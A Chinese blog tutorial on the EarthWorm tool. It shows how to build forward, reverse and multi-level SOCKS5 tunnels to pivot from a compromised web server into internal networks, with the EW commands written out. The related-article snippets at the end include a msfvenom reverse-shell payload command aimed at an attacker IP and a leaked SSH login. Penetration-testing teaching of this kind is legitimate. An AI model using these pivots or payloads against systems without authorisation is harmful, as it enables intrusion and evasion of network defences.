EW隧道搭建

最新推荐文章于 2025-04-10 21:06:44 发布
最新推荐文章于 2025-04-10 21:06:44 发布
阅读量2.1k 收藏 17
点赞数 4
分类专栏: 隧道搭建 文章标签: 内网渗透 隧道搭建 渗透测试 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45007073/article/details/116332861
版权

EW代理技术

常见的网络场景

  1. 服务器在内网中,可以任意访问外部网络
  2. 服务器在内网中,可以访问外部网络,但服务器安装了防火墙来拒绝敏感端口的连接
  3. 服务器在内网中,对外只开放了部分端口(80端口),且服务器不能访问外部网络

例如如下为常见的内网渗透测试环境
在这里插入图片描述

简介

EarthWorm简称EW,是一套便携式的网络工具,具有SOCKS5服务架设和端口转发功能,可以在复杂的网络环境中实现网络穿透。EW能够以正向、反向、多级级联等方式建立网络隧道。EW在实战中也是隧道搭建应用最多的一种隧道工具之一。

socks代理和端口转发的区别

端口转发工具(lcx.exe)的工作原理:是将两条socket隧道对接起来,打造一条可"异步双向通讯"的转接隧道。

socks代理的工作原理:当我们访问一个网站时,浏览器会先发送一个被访问目标的基本信息(URL和服务端口)给socks服务端,socks服务端解析了这个信息后,会代替浏览器去访问目标网站,并将访问结果回复给浏览器端。

socks代理功能的核心:帮他人完成socket访问网络,当我们通过代理服务器访问一个网址时,socks服务器其实是起了一个中间人的身份,它分别与双方(B/S)通讯然后将获取到的结果告知另一方。

socks代理和端口转发的异同点

  1. socket端口转发无需通讯协议支持,而socks代理需要socks协议支持
  2. socket端口工作方式不一样
  3. socks代理一对多,端口转发一对一

一级网络环境

现在我们的测试环境是:左侧内网中的一台个人计算机和一台公网IP的VPS,右侧是一个小型内网。假如已经获得一台Web服务器的权限,由我们控制的Web服务器是连接外网和内网的关键节点,内网其他服务器之间均不能直接连接。这里顺带说下,正向代理是指主动通过代理来访问目标机器,反向代理是指目标机器通过代理进行主动连接。

正向SOCKS5服务器

正向连接适用于目标机器拥有一个外网的IP地址的情况
在这里插入图片描述
我们直接在目标机器上输入如下命令,因为我的web服务器为ubuntu

./ew_for_linux64 -s ssocked -l 1070

在这里插入图片描述
我们使用SocksCap64代理工具检测到隧道是否搭建成功
在这里插入图片描述

反弹SOCKS5服务器

这种情况适用于目标机器没有公网IP地址,我们使其可以访问内网资源

在我们的VPS上执行如下命令,该命令的意思是在公网VPS上添加一个转接隧道,把1008端口收到的代理请求转发给888端口

./ew_for_linux64 -s rcsocks -l 1008 -e 888

在这里插入图片描述

然后在我们的内网主机上执行如下命令,该命令的意思是在该web服务器上启动socks5服务,然后反弹到我们的VPS的888端口上

ew -s rssocks -d VPS的IP地址

在这里插入图片描述
隧道建立成功
在这里插入图片描述

二级网络环境(a)

现在的测试环境是主机A配有两块网卡,一块能访问外网,另一块只能访问数据库服务器,无法访问内网中的其他资源。但数据库服务器内自由访问内网资源。配置这个网络环境只需在B主机的防火墙开启服务通行,域控和数据库服务器防火墙禁止A主机访问就可以了
在这里插入图片描述

首先我们将EW上传到B主机上,利用ssocksd方式启动888端口的SOCKS代理

ew_for_Win.exe -s ssocksd -l 888

在这里插入图片描述

然后将EW上传至A主机上,命令的意思是将1080端口收到的代理请求转发给B主机的888端口

sudo ./ew_for_linux64.exe -s lcx_tran -l 1080 -f 192.168.108.104 -g 888

在这里插入图片描述
通过访问A主机的外网1080端口使用在B主机上架设的SOCKS5代理
在这里插入图片描述

二级网络环境(b)

测试环境是:假设我们已经获得主机A和主机B的权限,但是主机A既不能访问外网,也不能访问内网,主机B能访问内网,但是无法访问外网。我们只需在前一个配置上将主机A的外网网卡去除即可
在这里插入图片描述
首先我们在我们的VPS上执行如下命令,该命令是指在公网VPS中添加转接隧道,将10800端口收到的代理请求转发给888端口

./ew_for_linux64 -s lcx_listen -l 10800 -e 888

在这里插入图片描述
然后在主机B中,以正向代理的方式启动999端口

ew_for_Win.exe -s ssocksd -l 999

在这里插入图片描述
在主机A中执行如下命令,命令是指在主机A上使用lcx_slave方式,将公网VPS的888端口和B主机的999端口连接起来

sudo ./ew_for_linux64 -s lcx_slave -d VPS地址 -e 888 -f 192.168.108.104 -g 999

在这里插入图片描述
访问VPS的10800端口使用架设在主机B的SOCKS5代理
在这里插入图片描述

三级网络环境

三级网络环境在渗透中比较少见,大多出现在一些金融项目中。首先我们的测试环境是:内网主机A没有公网IP地址,但可以访问外网;B主机不能访问外网,但可以被主机A访问;C主机可被B主机访问,而且能访问核心区域
在这里插入图片描述
首先我们在VPS上执行如下命令,将1080端口收到的代理请求转发给888端口

./ew_for_linux64 -s rcsocks -l 1080 -e 888

在这里插入图片描述
在主机A上执行如下命令,将公网VPS的888端口和B主机的999端口连接起来

./ew_for_linux64 -s lcx_slave -d VPS地址 -e 888 -f 192.168.108.104 -g 999

在这里插入图片描述
在域控上启动SOCKS5服务,并反弹到B主机的777端口上

ew_for_Win.exe -s rssocks -d 192.168.108.104 -e 777

在这里插入图片描述

通过访问VPS的1080端口可访问域控上架设的SOCKS5代理
在这里插入图片描述

总结

最后我们来总结一下EW的一些参数,因为EW在实战中应用得比较广泛

参数作用
-s设置代理的连接方式
-l设置本地的监听端口
-e设置要转发给哪个端口,一般作用为外网主机
-d设置要将代理请求转发给哪台主机(一般为外网的VPS)
-f设置要将代理请求转发给哪台主机(一般为内网的主机)
-g设置要转发给哪个端口,一般作用为内网主机
rcsocks在外网VPS主机上设置反向代理
rssocks在内网主机上设置反向代理
ssocks在目标机器上设置正向代理
lcx_tran设置本地端口映射,一般用在能访问内网不能访问外网的主机上,配合-l参数使用
lcx_listen设置监听的本地端口,配合-l参数使用
lcx_slave设置你要监听的远程主机,配合-d参数使用
EW 隧道
战神/calmness的博客
11-14 372
描述 环境 Windows 10 内网地址:192.168.1.14 kali 公网地址:192.168.28.130 过程 正向转发 ./ew_for_linux64 -s lcx_tran -l 1080 -f 192.168.1.14 -g 3389 反向端口转发 一个不成功的例子: kali机器上【攻击机】监听: Windows机器上执行 结果失败 一个成功的例子: 后面再写 ...
红队攻防实战之内网穿透隐秘隧道搭建
如果巅峰留不住,那就重走来时路
11-22 1625
别低头,皇冠会掉;别流泪,贱人会笑。
内网隧道——Earthworm(EW)
qq_55202378的博客
07-24 1423
EW参数作用Ssocksd正向代理Rcsock反向代理客户端Rssocks反向代理服务端Lcx_slave一侧通过反弹方式连接代理请求方,另一侧连接代理提供主机Lcx_tran通过监听本地端口接收代理请求,并转发给代理提供主机Lcx_listen通过监听本地端口接收数据,并将其转交给目标网络会连的代理提供主机。
内网渗透基础】二、隧道建立
最新发布
weixin_45597678的博客
04-10 471
内网隧道搭建
内网安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1926
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内网网站、本地支付接口调试、ssh访问、远程桌面,内网dns解析等等……),此外还支持内网http代理、内网socks5代理、p2p等,并带有功能强大的web管理端。
内网渗透搭建隧道
ssrf
06-05 2958
目录0x001 隧道介绍0x002 网络传输应用层检测连通性0x003 网络层ICMP隧道ptunnel使用 0x001 隧道介绍 什么是隧道? 在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
内网安全【5】隧道搭建
LfanBQX的博客
06-27 1465
也就是说目标点击后门会把流量转发到跳板机的5566端口,然后转发到kali的6666端口,我们生成后门的时候生成5566端口的后门,好让目标去找跳板机,然后监听就监听本地的6666端口即可。这里我们在生成木马的时候,监听地址应该写跳板机的,因为利用反向连接,目标主机找不到内网攻击机,下图可以看到写的后门会使当目标主机将权限给到这个跳板机的这个域名的时候,跳域名就会解析到刚才设置的攻击机的ip和端口。Frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。
内网攻防】内网穿透隐秘隧道搭建
如果巅峰留不住,那就重走来时路
10-27 1121
没有数值,我只看到了努力和汗水
渗透测试ew代理三层靶机穿透+proxifier配置规则
serendipity1130的博客
09-02 3133
1.远程连接: ssh yansiyu@10.177.228.176 W6WEwrqD 2.msf生成木马: cd /usr/share/metasploit-framework ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.177.228.128 LPORT=1234 -f elf > /home/load.elf 3.上传木马payload.elf文件到一层靶机: scp -p load.elf yansiyu@
[隧道代理] 隧道代理 — 应用层内网代理 - Earthworm(EW
Blue17 の 小窝
02-19 783
Eathworm 工具获取EarthWormEarthworm 简称 EW,是一款便携式的网络穿透工具,具有 SOCKS v5 服务架设和端口转发两大核心功能,可在复杂网络环境下完成网络穿透。不过可惜的是,该工具因其影响不好,已经宣布永久停止更新了,现在想下载只能去其他备份地址下载了(笔者上面提供了下载方式):该工具能够以 “正向”、”反向“、”多级级联“ 等方式打通一条网络隧道,直达网络深处,用蚯蚓独有的手段突破网络限制,给防火墙松土。
ew通过socks5一层代理-访问内网二层网络-实战篇
千寻的博客
10-11 2041
假设:目前已获取边界服务器(192.168.0.102)的权限,远程管理服务器 实现:通过ew,使得192.168.0.100能够访问内网的192.168.93.40上的主机
2024年网络安全工程师必读的100本书籍
2303_79055586的博客
05-01 315
攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。(都打包成一块的了,不能一一展开,总共300多集)因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取。
手把手带小姐姐搭建 Socks5 代理隧道
如果巅峰留不住,那就重走来时路
11-27 2969
再救你一次,不要让欲望击溃你的意志
ssh正向和反向隧道建立,及socks4/5代理
热门推荐
geogerli的专栏
12-26 1万+
ssh隧道包括正向隧道和反向隧道隧道的意思是,当我们用tcp协议通信时,不是有四层嘛,包括物理链路层,ip层,传输层(tcp/udp),应用层(http,ftp,smtp,ssh等,这些都是RFC公开的协议,当然也可以自定义协议,那就写socket吧,你得写组包,拆包,因为得处理粘包问题,还得写协议解析,如果是大型应用还得写连接管理,多线程,好麻烦的有木有,用现成的多好,拿来主义嘛),那么隧道
EW简单设置代理web服务器
The current road is different, love needs to distinguish between right and wrong
01-21 2841
正向代理 服务端我这里是在linux系统上进行监听的,使用的是阿里云的服务器。 ./ew_for_linux64 -s ssocksd -l 2222 #监听本地的2222端口 然后设置客户端,windows系统的话直接配置浏览器的代理或是使用类似proxifier的代理软件设置全局代理即可。 linux系统的话配置proxychains代理链的配置文件,设置成监听的ip和端口 vi /etc/proxychains4.conf 然后命令前面加上 proxy.
EW使用
cxk
07-02 8920
EW使用 靶机 win7 192.168.5.101 攻击机 win 10 192.168.0.31 攻击机 kali 192.168.5.102 1)ew 自身的各个选项用途说明 -l 指定要监听的本地端口 -d 指定要反弹到的机器 ip -e 指定要反弹到的机器端口 -f 指定要主动连接的机器 ip -g 指定要主动连接的机器端口 -t 指定超时时长,默认为 1000 2)执行正向转发 在k...
内网渗透| 隧道穿透的搭建从简单到高阶
MachineGunJoe666
06-19 1665
spp -name "test" -type proxy_client -server 服务器的ip -fromaddr :客户端木马端口 -toaddr :服务器端木马端口 -proxyproto tcp -proto ricmp。frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。转发规则 攻击机:5555 VPS:6000
内网穿透工具EW的简单使用(附内网环境实现)
markecheng的博客
12-15 8974
前言 EW全称叫做EarthWorm简称叫做EW,它是一套便携式的网络工具,具有SOCKS5服务架设和端口转发两大核心功能,并且包含着LCX工具的功能,可以再复杂的网络环境实现网络穿透 EW可以已正向和方向以及多级级联的方式建立网络隧道 这里示范简单的正向以及反向是实现过程 实现环境 目标,使用kali攻击机对windows 2008 R2目标服务器进行正向连接以及反向连接 过程 1.在EW工具包中,有很多版本,linux有32位的,以及64位的,首先我们需要输入以下命令来查看我们需要运行多少位的ew工具
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

平凡的学者

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值